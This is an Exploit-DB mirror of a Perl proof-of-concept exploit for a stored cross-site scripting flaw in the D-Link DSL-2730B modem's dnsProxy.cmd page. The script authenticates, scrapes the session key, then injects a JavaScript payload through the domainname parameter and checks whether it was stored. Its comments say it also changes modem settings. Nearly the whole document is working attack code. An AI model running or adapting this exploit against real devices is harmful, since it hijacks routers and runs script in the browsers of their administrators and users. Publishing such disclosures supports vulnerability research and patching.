D-Link DSL-2730B Modem – Cross-Site Scripting Injection Stored DnsProxy.cmd - 体验盒子

作者： XLabs Security
日期： 2015-01-11
类别：
webapps
平台：
hardware
来源：https://www.exploit-db.com/exploits/35750/
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux


#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enable some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
 

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;


my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

$ip = $1 if($ip=~/(.*)\/$/);

 if (@ARGV != 3){
 print "\n";
 print "XLabs Information Security www.xlabs.com.br\n";
 print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
 print "Developed by Mauricio Correa\n";
 print "Contact: mauricio\@xlabs.com.br\n";
 print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

 }else{

 print "XLabs Information Security www.xlabs.com.br\n";
 print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
 print "Developed by Mauricio Correa\n";
 print "Contact: mauricio\@xlabs.com.br\n";
 print "[+] Exploring $ip\/ ...\n";

 my $payload = "%27;alert(%27XLabsSec%27);\/\/";

 my $ua = new LWP::UserAgent;

 my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );


 $hdrs->authorization_basic($user, $pass);

 chomp($ip);
 

 print "[+] Preparing...\n";
 

 my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
 
 
 my $req = new HTTP::Request("GET",$url,$hdrs);

 print "[+] Prepared!\n";

 print "[+] Requesting...\n";

 my $resp = $ua->request($req);

 if ($resp->is_success){

 print "[+] Successfully Requested!\n";

 my $resposta = $resp->as_string;

 print "[+] Obtain session key...\n";
 
 my $token = "";
 
 if($resposta =~ /sessionKey=(.*)\';/){
 $token = $1; 
 print "[+] Session key found: $token\n";
 }else{
 print "[-] Session key not found!\n";
 exit;
 }


 print "[+] Preparing exploit...\n";
 
 my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";

 $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

 print "[+] Prepared!\n";

 print "[+] Exploiting...\n";
 
 my $resp2 = $ua->request($req);
 

 if ($resp2->is_success){

 my $resultado = $resp2->as_string;
 
if(index($resultado, uri_unescape($payload)) != -1){

print "[+] Successfully Exploited!";
 
}else{

print "[-] Not Exploited!";

}
 }

 }else {

 print "[-] Ops!\n";
 print $resp->message;
 }
}